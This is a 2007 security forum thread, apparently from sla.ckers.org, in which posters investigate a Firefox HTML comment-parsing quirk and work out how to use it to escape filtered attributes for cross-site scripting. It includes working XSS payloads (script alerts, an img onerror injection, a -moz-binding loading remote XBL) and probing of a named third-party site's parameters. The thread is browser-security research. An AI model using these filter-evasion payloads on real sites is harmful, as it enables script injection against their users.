Cenzic 232 Patent
Paid Advertising
sla.ckers.org is
ha.ckers sla.cking
Sla.ckers.org
Where you should disclose your vulnerabilities. Go read RFPolicy if you want to do responsible disclosure, and go here for when all else fails. 
Go to Topic: PreviousNext
Go to: Forum ListMessage ListNew TopicSearchLog In
Weird comment behavior in FF.
Posted by: tx
Date: June 08, 2007 07:17PM

I was looking at some poorly sanitized vars at istockphoto.com and I came across some weird FF commenting behavior, anyone got any insight/confirmation?

Look at this URL: h++p://www.istockphoto.com/user_view.php?id=1--

for some reason entering [number]-- as the id completely wrecks FF's rendering of the page (FF 2.0.0.4 XP). There doesn't seem to be any reason for this though :\
Viewing source shows a huge chuck of the source commented out until a seemingly arbitrary point. Viewing generated source shows everything as normal.
And it doesn't seem to happen in IE6, confirm?

EDIT: Behavior is reproduced if -- is anywhere in the query string. ie: http://www.istockphoto.com/file_search.php?action=file--&clearanceBin=%22%3E , http://www.istockphoto.com/file_search.php?action=file&clearanceBin=--%22%3E

-tx @ lowtech-labs.org



Edited 2 time(s). Last edit at 06/08/2007 07:21PM by tx.

Options: ReplyQuote
Re: Weird comment behavior in FF.
Posted by: Anonymous User
Date: June 09, 2007 01:49PM

Weird!

<!--
iweb5.istockphoto.com / RadwareDB (idb6) was pleased to serve you today.
Current url: www.istockphoto.com/file_search.php?action=file--&clearanceBin=
-->

Looks pretty much like a regex bug in FFox - did you already report it?

Options: ReplyQuote
Re: Weird comment behavior in FF.
Posted by: thornmaker
Date: June 09, 2007 10:26PM

weird indeed.

so you can insert text between the -- and the > when closing a comment...

firefox also seems to try to intelligently handle nested comments, though only to depth of one, e.g. a comment inside a comment. furthermore, the nested comment can begin without the <! , only the -- is needed. if i understand correctly, this is what is happening on the istockphoto.com page. it boils down to:

<!--
x--y
-->
z--w>

so line one starts the outside comment, line two starts the nested comment with the --, line three ends the nested comment (rather than the outside comment like i would expect), and line 4 ends the outside comment.

apparently you can also insert text between the <! and the -- at the beginning of a comment, however this messes up the nesting, so doing this in line one of the above example would cause the second line to not be treated as the opening of a nested comment.

note that you need a doctype for this to work properly. when i tried to reproduce this bug without one, i wasn't getting anything. with "HTML 4.01 Transitional" and "XHTML 1.1" it reproduced just fine.

i'm probably wrong but it seems this could be used to escape from a double quoted attribute that filters for double quotes. sort of like a multibyte injection, but the opening double quote is getting tampered with rather then the closing. for example, say a page had two injection points (three actually), the first injection being inserted into a comment at the top of the page which filters "<>, the second inject being inserted to an attribute of any field that is wrapped in double quotes which only filters ". so into the first you inject -- and into the second you inject --><div name= . if your third injection point is now following the next double quote, you might be able to actually do something there.

granted that's a lot of conditions that all have to be met, but theoretically it seems like it could work.

Options: ReplyQuote
Re: Weird comment behavior in FF.
Posted by: Anonymous User
Date: June 10, 2007 03:06AM

That is one cool browser bug, wow nice stuff.

Options: ReplyQuote
Re: Weird comment behavior in FF.
Posted by: Martin
Date: June 13, 2007 07:56AM

Really interesting find!

http://www.the-mice.co.uk/switch/ Switch/Twitch
http://code.google.com/p/dotnetids .NETIDS

Options: ReplyQuote
Re: Weird comment behavior in FF.
Posted by: Martin
Date: June 13, 2007 08:15AM

I did a little bit more playing around with it and turns out you only need 2 injection points - one in a comment and one in a double quote:

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN"
"http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>
test
</title>
<body>
<!-- This is the first injection point: -- -->
<a href="This is the second injection point: --evadefilter><b style=-moz-binding:url('http://www.md5-db.com/STXSS_XBL.xml#loader') /> <a href=test >link</a>
</body>
</html>

http://www.the-mice.co.uk/switch/ Switch/Twitch
http://code.google.com/p/dotnetids .NETIDS

Options: ReplyQuote
Re: Weird comment behavior in FF.
Posted by: thornmaker
Date: June 13, 2007 12:06PM

aah, good thinking Martin... eliminating the third injection point makes it much more useful. unfortunately, i don't see a way of doing it with a single injection that gets reflected to both a comment and to a subsequent attribute field. the close tag must have the > at the end but opening -- cannot have a > anywhere after it or it throws off the nesting.

Options: ReplyQuote
Re: Weird comment behavior in FF.
Posted by: Anonymous User
Date: June 13, 2007 01:07PM

Interesting thinking, that one can get complex, still it might be done with a mixture of reflected & stored XSS. Would be cool to see this on the XSS sheet, I know it's exotic, but who knows, could come in useful.

Options: ReplyQuote
Re: Weird comment behavior in FF.
Posted by: tx
Date: June 13, 2007 03:54PM

Wow there's a lot of response on this, excellent.

@thornmaker: It seems to me that opening any query that opens with --some-text> (or something similar) will work to break out of a quoted attribute if the variable is echoed both in the comment and then later in the attribute. I put up a little test page, http://tx.lowtechlive.com/comment.php?url=--end-comment%3E%3Cscript%3Ealert(String.fromCharCode(88,83,83));%3C/script%3E%3Ca%20href=%23

Basically, entering --end-comment><script>alert(String.fromCharCode(88,83,83));</script><a href=%23 as the value for $_GET['url'] causes the following html output (edited slightly to avoid linkification):


<!-- First the uri is echoed out, url encoded: url: h+tp://tx.lowtechlive.com/comment.php?url=--end-comment%3E%3Cscript%3Ealert(String.fromCharCode(88,83,83));%3C/script%3E%3Ca%20href=%23 -->
Then the value of the _GET['url'] variable is echoed, replacing any double quotes with the html entity: <a href="--end-comment><script>alert(String.fromCharCode(88,83,83));</script><a href=#">Here is the link</a>


And the alert successfully fires.

EDIT: Note that everything between <!-- and --end-comment> is commented out.

-tx @ lowtech-labs.org



Edited 3 time(s). Last edit at 06/13/2007 04:00PM by tx.

Options: ReplyQuote
Re: Weird comment behavior in FF.
Posted by: thornmaker
Date: June 13, 2007 07:23PM

@tx: nice! so it can be done with a single injection reflected twice.

however, that will only work if, as in the demo page you provide, the > character is url encoded when reflected in the comment, and not url encoded when reflected in the attribute. I'm still looking for a way to make it work when the reflected text is the exact same in both instances. wouldn't this be a more likely situation?

Options: ReplyQuote
Re: Weird comment behavior in FF.
Posted by: tx
Date: June 13, 2007 08:43PM

The thing is, imho, if < or > aren't filtered out the first time, then the comment could just be ended with --> , which kind of makes it a moot point.

Example (this page doesn't url encode the variable): h+tp://tx.lowtechlive.com/comment_no_enc.php?url=--%3E%20%3Cimg%20src=333%20onerror=alert(1)%3E%20%3C!--%20--


That uses this query:
--> <img src=333 onerror=alert(1)> <!-- --

It successfully alerts twice and breaks out of the quoted attribute, but it's really just a fancy way of going --><script>whatever();</script>

-tx @ lowtech-labs.org



Edited 2 time(s). Last edit at 06/13/2007 08:46PM by tx.

Options: ReplyQuote
Re: Weird comment behavior in FF.
Posted by: thornmaker
Date: June 13, 2007 09:11PM

I agree with you. if the > isn't filtered from the commented portion, then you can just do your injection there like your page demonstrates. what i was trying to get at earlier was to have the injection reflected twice, with the exact same text reflected, but where the -- was being interpreted as a comment still so that everything is commented out until the where the injection is reflected the second time... basically the -- needs to be used as an open tag in one place and as part of a close tag in the next. i would like to try some fuzzing on this before I decide its not possible, but from what i've tested so far, no dice. probably, the best we are going to get is martin's variation with two injections, or your variation with just one. still, very cool.



Edited 1 time(s). Last edit at 06/13/2007 09:12PM by thornmaker.

Options: ReplyQuote
Re: Weird comment behavior in FF.
Posted by: Martin
Date: June 14, 2007 05:05AM

thornmaker - it is doable:

2 injection points
IJ1 is inside a comment and encodes < and >
IJ2 is doublequotes attribute that doesn't encode < and >

Injection: test --> <script>alert(1)</script>

At IJ1 this will look like: test --&gt; &lt;script&gt;alert(1)&lt;script&gt;
Whilst at IJ2 it will be: test --> <script>alert(1)</script>

An example of a final page rendering using this:

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN"
"http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>
test
</title>
<body>
<!--
INJECTION #1: test --&gt; &lt;script&gt;alert(1)&lt;script&gt;
-->

INJECTION #2: <a href="test --> <script>alert(1)</script>">This is a link</a>
</body>
</html>

http://www.the-mice.co.uk/switch/ Switch/Twitch
http://code.google.com/p/dotnetids .NETIDS

Options: ReplyQuote
Re: Weird comment behavior in FF.
Posted by: Martin
Date: June 14, 2007 10:16AM

Ok, in addition to the previous post I think I worked out some more how Firefox is handling comments. Apologies if you already knew this - I didn't!

The symbol Firefox uses for start of comment is not "<!--" it is purely "<!" and the close tag for comments is ">"

Therefore:

<! this is a comment >

is rendered as a valid Firefox comment.

However, there are some strange things going on!

Here's another test page:

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN"
"http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>
test
</title>
<body>

[Comment 1]
<! comment #1 >
<br/>
[End of Comment 1]

<br/>
[Comment 2]
<!--
Comment #2
-->
<br/>
[End of Comment 2]

<br/>
[Comment 3]
<!
Comment #3
--
Comment #3 Part 2
>
<br/>
[End of Comment 3]

<br/>
[Comment 4]
<!
Comment #4
--
Comment #4 Part 2
-->
<br/>
[End of Comment 4]

<br/>
[Comment 5]
<!--
Comment #5
--
Comment #5 Part 2 (Nested)
-->
Comment #5 Part 3
-->
<br/>
[End of Comment 5]

<br/>
[Comment 6]
<!--
Comment #6
--
Comment #6 Part 2 (Nested)
--
Comment #6 Part 3
--
Comment #6 Part 4
--
Comment #6 Part 5
-->
<br/>
[End of Comment 6]

<br/>
[Comment 7]
<!--
Comment #7
--
>
-->
<br/>
[End of Comment 7]

</body>
</html>

I'm still trying to work out some rules for how this all works!

http://www.the-mice.co.uk/switch/ Switch/Twitch
http://code.google.com/p/dotnetids .NETIDS

Options: ReplyQuote
Re: Weird comment behavior in FF.
Posted by: thornmaker
Date: June 14, 2007 11:22AM

so you could use a <!--, a <!, or a -- placed somewhere before an injectable attribute to break out of the attribute... and each might be useful in situations where the others are not depending on what's filtered and other content content on the page.

Options: ReplyQuote
Re: Weird comment behavior in FF.
Posted by: trev
Date: July 07, 2007 05:18PM

Just a note: this is bug 233270 and actually not a bug.

Options: ReplyQuote


Sorry, only registered users may post in this forum.